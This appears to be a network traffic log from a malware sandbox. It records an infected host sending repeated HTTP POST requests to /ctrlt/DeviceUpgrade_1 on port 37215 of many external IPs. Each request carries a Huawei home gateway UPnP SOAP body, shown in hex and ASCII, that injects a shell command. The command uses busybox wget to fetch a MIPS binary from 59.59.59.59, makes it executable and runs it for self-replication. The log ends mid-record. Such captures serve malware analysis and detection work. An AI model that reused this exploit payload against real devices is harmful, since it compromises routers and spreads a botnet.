                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          125192.168.2.154416241.29.218.16437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541645050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          126192.168.2.1544038157.218.14.17337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541646957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          127192.168.2.154957441.82.12.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541668892 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          128192.168.2.1549440123.245.125.18237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541682005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          129192.168.2.1555586197.63.179.19837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541837931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          130192.168.2.155553841.184.48.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541872978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          131192.168.2.1542010119.15.85.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541873932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          132192.168.2.1534586100.166.56.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541898966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          133192.168.2.153663691.124.146.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.541929960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          134192.168.2.154798841.176.113.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.542105913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 